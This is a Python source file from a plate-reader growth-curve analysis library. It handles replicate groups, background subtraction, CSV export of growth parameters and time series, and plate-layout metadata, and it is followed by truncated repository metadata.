for sampleid in sampleids:
conditions=list(self._sampleConditionToWellIdcs[sampleid].keys())
conditions.sort()
for condition in conditions:
comptc=Replicate(self,self._sampleConditionToWellIdcs[sampleid][condition],
None,condition,isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
def _createSampleConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find replicate groups based on sample id and condition.
For internal use only.
"""
self._sampleConditionToReplicateGroupIdcs={}
coidx=0
for tc in self.replicateGroups:
if tc.sampleid not in self._sampleConditionToReplicateGroupIdcs:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToReplicateGroupIdcs[tc.sampleid]:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition].append(coidx)
coidx+=1
def _createConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find all replicate groups for a specific condition.
For internal use only.
"""
self._conditionToReplicateGroupIdx={}
coidx=0
for tc in self.replicateGroups:
# add replicate group to the condition mapping
if tc.condition not in self._conditionToReplicateGroupIdx:
self._conditionToReplicateGroupIdx[tc.condition]=[]
self._conditionToReplicateGroupIdx[tc.condition].append(coidx)
coidx+=1
def _setBackgroundForAllReplicates(self,backgroundSampleIds):
"""
Set background replicate group for single-wells and replicate groups.
Currently, if there are multiple background ids, an exception is raised.
For internal use only.
"""
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
if backgroundSampleIds is None or not len(backgroundSampleIds):
if self.wells is not None:
for tc in self.wells:
tc._setBackgroundIndex(None)
if self.replicateGroups is not None:
for tc in self.replicateGroups:
tc._setBackgroundIndex(None)
self._setBackgroundStatus()
return
if len(backgroundSampleIds) > 1:
raise Plate.MultipleBackgroundIdsError(backgroundSampleIds)
backgroundSampleId=backgroundSampleIds[0]
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
# set background index for the single (non-averaged) wells
for tc in self.wells:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# set background for replicate groups
for tc in self.replicateGroups:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# append warnings to self._loadStatus if for some replicates no background was set
self._setBackgroundStatus()
def replicateGroupIdxForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: int -- Index (into self.replicateGroups) of Replicate with given id and condition.
"""
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
if sampleid not in self._sampleConditionToReplicateGroupIdcs:
return None
if condition not in self._sampleConditionToReplicateGroupIdcs[sampleid]:
return None
if len(self._sampleConditionToReplicateGroupIdcs[sampleid][condition]) != 1:
raise RuntimeError('more than one replicate group for '+sampleid+' '+condition)
return self._sampleConditionToReplicateGroupIdcs[sampleid][condition][0]
def replicateGroupForSampleCondition(self,sampleid,condition):
"""
Return the replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: Replicate -- replicate group with given id and condition.
"""
idx=self.replicateGroupIdxForSampleCondition(sampleid,condition)
if idx is None:
return None
return self.replicateGroups[idx]
def replicateGroupIdcsForCondition(self,condition):
"""
Return a list of indices of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(int) -- Indices (into self.replicateGroups) of replicate groups with the given condition.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
if condition not in self._conditionToReplicateGroupIdx:
return None
return self._conditionToReplicateGroupIdx[condition]
def replicateGroupsForCondition(self,condition):
"""
Return a list of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(Replicate) -- Replicate groups with given condition.
"""
idcs=self.replicateGroupIdcsForCondition(condition)
if idcs is None:
return None
tcs=[]
for idx in idcs:
tcs.append(self.replicateGroups[idx])
return tcs
def conditions(self):
"""
Return a list of conditions.
:return: list(str) -- Conditions.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
conditions=list(self._conditionToReplicateGroupIdx.keys())
conditions.sort()
return conditions
def nonBackgroundReplicates(self):
"""
:return: list(Replicate) -- replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckg=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def nonBackgroundReplicateIndices(self):
"""
:return: list(int) -- Indices of replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckgidcs=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckgidcs.append(idx)
idx+=1
return nbckgidcs
def nonBackgroundWells(self):
"""
:return: list(Replicate) -- wells that are not background samples.
"""
backgroundIndices=self.backgroundWellIndices()
nbckg=[]
idx=0
for tc in self.wells:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def _indexOfReplicateGroup(self,ctc):
"""
Determine the index of the given replicate group.
For internal use only.
:return: int -- Index of replicate group.
"""
if self.replicateGroups is None:
return None
idx=0
idxOfTc=None
for ttc in self.replicateGroups:
if ttc._wellIndices == ctc._wellIndices:
if idxOfTc is not None:
raise RuntimeError("multiple similar replicate groups?")
else:
idxOfTc=idx
idx+=1
return idxOfTc
def _parametersUpdated(self,par=None):
"""
Notify replicate(s) that a parameter changed and memoised results should be deleted.
For internal use only.
:param par: The name of the parameter that was changed.
:type par: str
The Replicate objects memoise some results that are expensive
to calculate. When a parameter is updated, the results may not
be valid anymore and should get removed from the "cache".
If par is given, this method can decide which results should
be removed.
"""
# only needed for non-background replicate groups (as background does not depend on parameters)
for tc in self.nonBackgroundWells():
tc._parametersUpdated(par,dontRecurse=True)
for tc in self.nonBackgroundReplicates():
tc._parametersUpdated(par,dontRecurse=True)
self.modified=True
def _replicateChanged(self,tc,par=None):
"""
Update replicates that depend on the given replicate.
For internal use only.
"""
if self.replicateGroups is None:
# for startup code: there are no replicate groups yet
return
idxOfTc=self._indexOfReplicateGroup(tc)
if idxOfTc is None:
raise RuntimeError("no matching tc for "+tc.fullId())
for ptc in self.wells:
if ptc._backgroundIndex == idxOfTc:
ptc._parametersUpdated(par='backgroundRawOd')
for ctc in self.replicateGroups:
if ctc._backgroundIndex == idxOfTc:
ctc._parametersUpdated(par='backgroundRawOd')
def _getDefaultParameter(self,par):
"""
Get default value of parameter.
For internal use only.
:param par: The name of the parameter.
:type par: str
The Plate stores values of plate-wide parameters
and default parameters.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_getDefaultParameter: unknown parameter '+par)
return self._inheritableParameters[par]
def _getExplicitParameter(self,par):
"""
Get explicit value of parameter (alias for _getDefaultParameter).
For internal use only.
:param par: The name of the parameter.
:type par: str
"""
return self._getDefaultParameter(par)
def getParameter(self,par):
"""
Return the requested parameter.
:param par: The name of the parameter.
:type par: str
If the parameter is explicitly set for the plate, this value
is returned. Otherwise return None.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getDefaultParameter(par)
def parameterIsEditible(self,par):
"""
Return True if this parameter can have a plate-wide default.
:return: bool -- True if parameter can be edited.
Some parameters can only be changed per Replicate, some only
per Plate. This method is used to distinguish between them.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
if par in Plate._isNotPlateParameter and Plate._isNotPlateParameter[par]:
return False
if par not in self._inheritableParameters:
raise RuntimeError("parameterIsEditible: unknown parameter "+par)
return True
def parameterIsExplicitlySet(self,par):
"""
Return True if this parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set.
If a parameter is explicitly set for a replicate it overrides
an inherited value. This method is used to tell whether this
is the case. Since this object is a plate it tells whether a
default value has been set.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getExplicitParameter(par) is not None
def activeChildReplicatesHaveExplicitParameter(self,par):
"""
Return True if for at least one of the replicate groups the given parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set in one of the replicate groups.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
for childtc in self.nonBackgroundReplicates():
if childtc._getExplicitParameter(par) is not None:
return True
if childtc.activeChildReplicatesHaveExplicitParameter(par):
return True
return False
def _setDefaultParameter(self,par,val):
"""
Change the (default) value of the given parameter.
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_setDefaultParameter: unknown parameter '+par)
self._inheritableParameters[par]=val
self._parametersUpdated(par)
def _setExplicitParameter(self,par,val):
"""
Change the value of the given parameter (alias for _setDefaultParameter).
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
self._setDefaultParameter(par,val)
def setMaxGrowthLowerTimeCutoff(self,t):
"""Set lower limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthLowerTimeCutoff',t)
def setMaxGrowthUpperTimeCutoff(self,t):
"""Set upper limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthUpperTimeCutoff',t)
def setLogOdCutoff(self,lod):
"""Set cutoff value of log(OD)."""
self._setDefaultParameter('logOdCutoff',lod)
def setLagAtLogOdEquals(self,lagat):
"""Set value of log(OD) used to define the lag time."""
self._setDefaultParameter('lagAtLogOdEquals',lagat)
def setHighDensityCorrectionLinear(self,hdCorrectionLinear=None):
"""Set coefficient of linear term of high density correction."""
self._setDefaultParameter('hdCorrectionLinear',hdCorrectionLinear)
def setHighDensityCorrectionQuadratic(self,hdCorrectionQuadratic=None):
"""Set coefficient of quadratic term of high density correction."""
self._setDefaultParameter('hdCorrectionQuadratic',hdCorrectionQuadratic)
def setHighDensityCorrectionCubic(self,hdCorrectionCubic=None):
"""Set coefficient of cubic term of high density correction."""
self._setDefaultParameter('hdCorrectionCubic',hdCorrectionCubic)
def setSmoothingK(self,k):
"""Set degree of the smoothing spline."""
self._setDefaultParameter('smoothingK',k)
def setSmoothingS(self,s):
"""Set smoothing factor used to choose the number of knots."""
self._setDefaultParameter('smoothingS',s)
def setSlidingWindowSize(self,win):
"""
Set the number of datapoints of the sliding window.
This value is used for the local exponential fit (growth rate) and the linear regression (growth yield).
"""
self._setDefaultParameter('slidingWindowSize',win)
@staticmethod
def guessWellIds(numberOfWells):
"""
Return well ids by guessing the plate layout based on number of wells.
This function will return A1-P24 or A1-H12.
:param numberOfWells: number of wells of the plate
:type numberOfWells: int
:return: list(str) -- the guessed well ids (None if layout could not be guessed)
"""
# some "heuristics" about well ids: A1-P24 or A1-H12
if numberOfWells == 384:
labeldivisor=24
elif numberOfWells == 96:
labeldivisor=12
else:
return None
rowlabels=[chr(x) for x in range(ord('A'), ord('P') + 1)]
wellids=[]
for i in range(numberOfWells):
(lblchar,lblnum)=divmod(i, labeldivisor)
wellids.append(str(rowlabels[lblchar])+str(lblnum+1))
return wellids
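# Example: guessWellIds(96) yields ['A1', ..., 'A12', 'B1', ..., 'H12'], guessWellIds(384) yields
# ['A1', ..., 'A24', ..., 'P24'], and any other well count returns None.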
@staticmethod
def availableColumnsForCsvExport(logOdDerivativeProperties=True):
"""
List the available properties that can be chosen for csv export.
:param logOdDerivativeProperties: include properties determined from log(OD) derivative
:type logOdDerivativeProperties: bool
:return: list(str), list(str) -- fixed columns (ids), properties
The 'fixed columns' list contains the sample/condition tuples
which should always be exported in order to identify the
replicates. For the other properties (except 'wellids') the
variance can be chosen by adding '_var' to the property name.
"""
fixedcolumns=['sample','condition']
columns=[]
columns.extend(['slope_linear',
'intercept_linear',
'timeOfMax_linear',
'lag_linear'])
columns.extend(['doublingtime_expfit',
'growthrate_expfit',
'od0_expfit',
'timeOfMax_expfit',
'lag_expfit'])
if logOdDerivativeProperties:
columns.extend(['doublingtime_local',
'growthrate_local',
'od0_local',
'timeOfMax_local',
'lag_local'])
columns.extend(['yield',
'timeOfYield'])
columns.extend(['wellids'])
return fixedcolumns, columns
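# Example: fixed, cols = Plate.availableColumnsForCsvExport() gives fixed == ['sample', 'condition']
# and cols containing e.g. 'slope_linear' and 'yield'; variance columns are requested as 'slope_linear_var' etc.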
def growthParametersToCsv(self,filename,addVarianceColumns=True,singleWells=False, columns=None, progressCall=None,
**csvkwargs):
"""
Write a "comma separated values" (csv) file of properties for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of properties that shall get exported (in that order).
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export properties of single well replicates instead of replicate groups
:type singleWells: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'lag_expfit': 'lag_expfit (ln(OD) == lagAtCutoff)',
'lag_expfit_var': 'lag_expfit_var (ln(OD) == lagAtCutoff)',
'lag_local': 'lag_local (ln(OD) == lagAtCutoff)',
'lag_local_var': 'lag_local_var (ln(OD) == lagAtCutoff)',
}
if columns is None:
columns, morecolumns=Plate.availableColumnsForCsvExport()
columns.extend(morecolumns)
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['sample','condition','wellids']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
descrow=[]
for col in columns:
if col in col2collabel:
descrow.append(col2collabel[col])
else:
descrow.append(col)
sliwriter.writerow(descrow)
allcnt=-1
for tc in replicates:
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
if tc.od() is not None:
doublingtime_ef=None
doublingtimevar_ef=None
doublingtime_nls=None
doublingtimevar_nls=None
lag_linear=None
lagVar_linear=None
mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var, method_ef, status = tc.maxGrowthrate()
mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var, method_nls, status = tc.maxGrowthrateFromLogOdDerivative()
growthyield, growthyield_var, tgrowthyield, tgrowthyield_var, status=tc.growthyield()
slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear, timeOfMax_linear, timeOfMaxVar_linear, timeOfMaxIndices_linear, plainSlopeStatus=tc.odSlopemaxIntercept()
doublingtime_ef, doublingtimevar_ef=Replicate.growthrateToDoublingTime(mu_ef,mu_ef_var)
doublingtime_nls, doublingtimevar_nls=Replicate.growthrateToDoublingTime(mu_nls,mu_nls_var)
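# lag_linear is where the linear fit crosses OD 0, i.e. lag = -intercept/slope; its variance below
# follows from first order error propagation:
#   Var(lag) = (intercept/slope**2)**2 * Var(slope) + (1/slope)**2 * Var(intercept)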
if slope_linear is not None and slope_linear != 0:
lag_linear=-intercept_linear/(slope_linear)
if slopeVar_linear is not None and interceptVar_linear is not None:
lagVar_linear=((intercept_linear/(slope_linear**2))**2 * slopeVar_linear +
1/slope_linear**2 * interceptVar_linear)
else:
(doublingtime_ef, doublingtimevar_ef, doublingtime_nls, doublingtimevar_nls)=(None,None,None,None)
(mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var)=([None,None,None,None,None,None,None,None])
(mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var)=([None,None,None,None,None,None,None,None])
(growthyield,growthyield_var,tgrowthyield,tgrowthyield_var)=([None,None,None,None])
(slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear,
timeOfMax_linear, timeOfMaxVar_linear, lag_linear, lagVar_linear)=([None,None,None,None,None,None,None,None])
thisrow=[]
for col in columns:
if col == 'sample':
thisrow.append(tc.sampleid)
elif col == 'condition':
thisrow.append(tc.condition)
elif col == 'slope_linear':
thisrow.append(slope_linear)
elif col == 'slope_linear_var':
thisrow.append(slopeVar_linear)
elif col == 'intercept_linear':
thisrow.append(intercept_linear)
elif col == 'intercept_linear_var':
thisrow.append(interceptVar_linear)
elif col == 'timeOfMax_linear':
thisrow.append(timeOfMax_linear)
elif col == 'timeOfMax_linear_var':
thisrow.append(timeOfMaxVar_linear)
elif col == 'lag_linear':
thisrow.append(lag_linear)
elif col == 'lag_linear_var':
thisrow.append(lagVar_linear)
elif col == 'doublingtime_expfit':
thisrow.append(doublingtime_ef)
elif col == 'doublingtime_expfit_var':
thisrow.append(doublingtimevar_ef)
elif col == 'growthrate_expfit':
thisrow.append(mu_ef)
elif col == 'growthrate_expfit_var':
thisrow.append(mu_ef_var)
elif col == 'od0_expfit':
thisrow.append(od0_ef)
elif col == 'od0_expfit_var':
thisrow.append(od0_ef_var)
elif col == 'timeOfMax_expfit':
thisrow.append(maxt_ef)
elif col == 'timeOfMax_expfit_var':
thisrow.append(maxt_ef_var)
elif col == 'lag_expfit':
thisrow.append(lag_ef)
elif col == 'lag_expfit_var':
thisrow.append(lag_ef_var)
elif col == 'doublingtime_local':
thisrow.append(doublingtime_nls)
elif col == 'doublingtime_local_var':
thisrow.append(doublingtimevar_nls)
elif col == 'growthrate_local':
thisrow.append(mu_nls)
elif col == 'growthrate_local_var':
thisrow.append(mu_nls_var)
elif col == 'od0_local':
thisrow.append(od0_nls)
elif col == 'od0_local_var':
thisrow.append(od0_nls_var)
elif col == 'timeOfMax_local':
thisrow.append(maxt_nls)
elif col == 'timeOfMax_local_var':
thisrow.append(maxt_nls_var)
elif col == 'lag_local':
thisrow.append(lag_nls)
elif col == 'lag_local_var':
thisrow.append(lag_nls_var)
elif col == 'yield':
thisrow.append(growthyield)
elif col == 'yield_var':
thisrow.append(growthyield_var)
elif col == 'timeOfYield':
thisrow.append(tgrowthyield)
elif col == 'timeOfYield_var':
thisrow.append(tgrowthyield_var)
elif col == 'wellids':
thisrow.append(tc.activeChildWellIdStr())
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
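    # Usage sketch (illustration only): the enclosing method's name is not visible in
    # this excerpt, so 'propertiesToCsv' below is an assumed name; the keyword
    # arguments follow the docstring above and 'plate' stands for an initialised Plate.
    #   plate.propertiesToCsv('growth_properties.csv')            # default columns
    #   plate.propertiesToCsv('per_well.csv', singleWells=True)   # one row per single well
    #   plate.propertiesToCsv('semicolon.csv', delimiter=';')     # csvkwargs are passed to the csv module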
def timeseriesToCsv(self,filename,
addVarianceColumns=True,
singleWells=False,
columns=None,
fullId=False,
progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of time series for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of time series that shall get exported for each replicate.
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export time series of single well replicates instead of replicate groups
:type singleWells: bool
:param fullId: Label the columns with the full id (including well ids) instead of "sample condition"
:type fullId: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'od': 'OD',
'od_var': 'var(OD)',
'lnod': 'ln(OD)',
}
if columns is None:
columns=['od']
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['lnod']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
# header
descrow=['t']
for tc in replicates:
for col in columns:
if col in col2collabel:
lbl=col2collabel[col]
else:
lbl=col
if fullId:
lbl+=' '+tc.fullId()
else:
lbl+=' '+tc.sampleid+' '+tc.condition
if singleWells:
lbl+=' '+tc.activeChildWellIdStr()
descrow.append(lbl)
sliwriter.writerow(descrow)
# data
allcnt=-1
for ti in range(len(self.time)):
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
thisrow=[]
thisrow.append(self.time[ti])
for tc in replicates:
for col in columns:
if col == 'od':
if tc.od() is not None:
thisrow.append(tc.od()[ti])
else:
thisrow.append(None)
elif col == 'od_var':
if tc.odVar() is not None:
thisrow.append(tc.odVar()[ti])
else:
thisrow.append(None)
elif col == 'lnod':
if tc.logOd() is not None:
thisrow.append(tc.logOd()[ti])
else:
thisrow.append(None)
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
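    # Usage sketch (illustration only, assuming an initialised Plate instance named 'plate'):
    #   plate.timeseriesToCsv('timeseries.csv')                     # OD and var(OD) per replicate group
    #   plate.timeseriesToCsv('wells_lnod.csv', singleWells=True,
    #                         columns=['od', 'lnod'], fullId=True)  # per-well OD and ln(OD)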
@staticmethod
def _numWellsToFormatString(numWells):
"""
Return a string uniquely identifying a plate format.
NOTE this function is subject to change.
"""
if numWells == 100:
return '100honeycomb'
elif numWells == 200:
return '200honeycomb'
return str(numWells)
@staticmethod
def writeMetadata(filename,metadata,metadataKeys,plateformat='96',**csvkwargs):
"""
:param metadata: the metadata
:type metadata: list(dict)
"""
columnMajorOrder=False
if plateformat == '96':
if len(metadata) != 96:
raise RuntimeError('metadata is not of length 96')
numcols=12
numrows=8
elif plateformat == '384':
if len(metadata) != 384:
raise RuntimeError('metadata is not of length 384')
numcols=24
numrows=16
elif plateformat == '200honeycomb':
if len(metadata) != 200:
raise RuntimeError('metadata is not of length 200')
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,len(metadata),numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
if columnMajorOrder:
reordered=[]
# transpose
for rowidx in range(numrows):
for colidx in range(numcols):
metentryidx=rowidx + colidx * numrows
reordered.append(metadata[metentryidx])
else:
reordered=metadata # keep order
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeWriter(filename,**csvkwargs) as writer:
# header: just the name of the metadata
for key in metadataKeys:
row=[key]
writer.writerow(row)
# the column ids
row=['<>']
row.extend(collabels)
writer.writerow(row)
# now the data, divided into rows of numcols columns
colit=reordered.__iter__()
for rowlab in rowlabels:
row=[rowlab]
for j in range(numcols):
thismeta=next(colit)
val=thismeta[key] if key in thismeta else None
row.append(val)
writer.writerow(row)
# an empty row
row=[]
writer.writerow(row)
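    # Usage sketch (illustration only): write an empty 96-well metadata template that
    # can be filled in by hand and read back with readMetadata.
    #   Plate.writeMetadata('metadata_template.csv',
    #                       [{} for i in range(96)],
    #                       Plate.metadataKeys,
    #                       plateformat='96')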
@staticmethod
def readMetadata(filename,plateformat='96',**csvkwargs):
"""
Read metadata from a csv file.
For each metadata key a table is read. The table should be laid
        out according to the plate layout. To get a template, call
writeMetadata(outfile,[{} for i in range(numOfColumns)],Plate.metadataKeys)
"""
columnMajorOrder=False
if plateformat == '96':
numcols=12
numrows=8
elif plateformat == '384':
numcols=24
numrows=16
elif plateformat == '200honeycomb':
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,numcols*numrows,numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
# initialise the metadata list
metadata=[{} for i in range(numcols*numrows)]
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeReader(filename,**csvkwargs) as odreader:
nextlinemode='nada'
metkey=None
lineno=0
for row in odreader:
lineno+=1
if nextlinemode == 'nada':
if len(row) == 0 or row[0] == '':
# skip empty row
continue
else:
metkey=row[0]
nextlinemode='starttable'
elif nextlinemode == 'starttable':
if len(row) == 0:
raise Plate.BadMetadata('Row at start of table is empty',lineno,filename=filename)
if row[0] != '<>' or row[1] != '1' or len(row) != numcols+1:
raise Plate.BadMetadata('This does not look like the beginning of a table'+
', expected row[0] == "<>", row[1] == "1" and len(row) == '+str(numcols+1)+
', but got row[0]=="'+str(row[0])+'", row[1] == "'+str(row[1])+
'" and len(row) == '+str(len(row)),
lineno,filename=filename)
nextlinemode='intable'
rowcnt=0
metit=metadata.__iter__()
elif nextlinemode == 'intable':
rowcnt+=1
if len(row) == 0:
raise Plate.BadMetadata('Row '+str(rowcnt)+' is empty',lineno,filename=filename)
if row[0].upper() != rowlabels[rowcnt-1]:
raise Plate.BadMetadata('Row '+str(rowcnt)+' does not start with '+rowlabels[rowcnt-1]+
' (found "'+row[0].upper()+'")',lineno,filename=filename)
row.pop(0)
numOfValsThisRow=len(row)
if numOfValsThisRow > numcols:
numOfValsThisRow=numcols
# read the columns of this row
colit=row.__iter__()
for i in range(numOfValsThisRow):
val=next(colit)
if val == '':
                            # map empty string to None
val=None
metentry=next(metit)
metentry[metkey]=val
# if the last columns are empty, fill them up with None
for i in range(numcols-numOfValsThisRow):
metentry=next(metit)
metentry[metkey]=None
if rowcnt == numrows:
nextlinemode='nada'
if columnMajorOrder:
reordered=[]
for colidx in range(numcols):
for rowidx in range(numrows):
metentryidx=rowidx * numcols + colidx
reordered.append(metadata[metentryidx])
metadata=reordered
return metadata
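    # Usage sketch (illustration only): read a filled-in template back; the result is
    # one dict per well in the order implied by the plate format. The 'sample' key is
    # an assumption and depends on the metadata keys used when writing the template.
    #   metadata = Plate.readMetadata('metadata_template.csv', plateformat='96')
    #   first_well_sample = metadata[0].get('sample')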
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MultipleBackgroundIdsError(Error):
"""Exception raised if there are different IDs for background wells."""
def __init__(self, backgroundSampleIds):
self._backgroundSampleIds = backgroundSampleIds
def __str__(self):
return str('multiple keys were found that could be background (blank) samples, make sure there is only one.' +
'\nThe keys are:\n'+str(self._backgroundSampleIds))
class UnknownFileFormat(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,filename,serFormat=None,serFormatVersion=None,detailedError=None):
self.filename = filename
self.serFormat = serFormat
self.serFormatVersion = serFormatVersion
self.detailedError = detailedError
def __str__(self):
if self.serFormat is not None:
if self.serFormat.startswith('clsplates'):
message= 'You tried to open a Chronological Life Span (CLS) file ("'+self.filename+'"), please use the CLS analyser for this'
else:
message = 'Unsupported file format "'+self.serFormat+'"'
if self.serFormatVersion is not None:
message += ' version "'+self.serFormatVersion+'"'
message += ' in file "'+self.filename+'"'
else:
message = 'Unsupported file format in file "'+self.filename+'"'
if self.detailedError is not None:
message+=': '+self.detailedError+'.'
else:
message+='.'
return message
class BadMetadata(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,detailedError=None,lineno=None,filename=None):
self.detailedError = detailedError
self.filename = filename
self.lineno = lineno
def __str__(self):
message = self.detailedError
if self.lineno is not None:
message += ' around line '+str(self.lineno)
if self.filename is not None:
message += ' in file '+str(self.filename)
return message
|
platereader/gathode
|
platereader/plate.py
|
plate.py
|
py
| 71,939 |
python
|
en
|
code
| 4 |
github-code
|
6
|
[
{
"api_name": "platereader.parser.modulenameToModule",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "platereader.parser",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "platereader.parser.getModulesOfNamespace",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "platereader.parser",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "platereader.statusmessage.StatusMessage",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "os.path.path.exists",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "os.path.path",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "bz2.BZ2File",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 169,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 182,
"usage_type": "call"
},
{
"api_name": "platereader.replicate.Replicate",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path.path.splitext",
"line_number": 260,
"usage_type": "call"
},
{
"api_name": "os.path.path",
"line_number": 260,
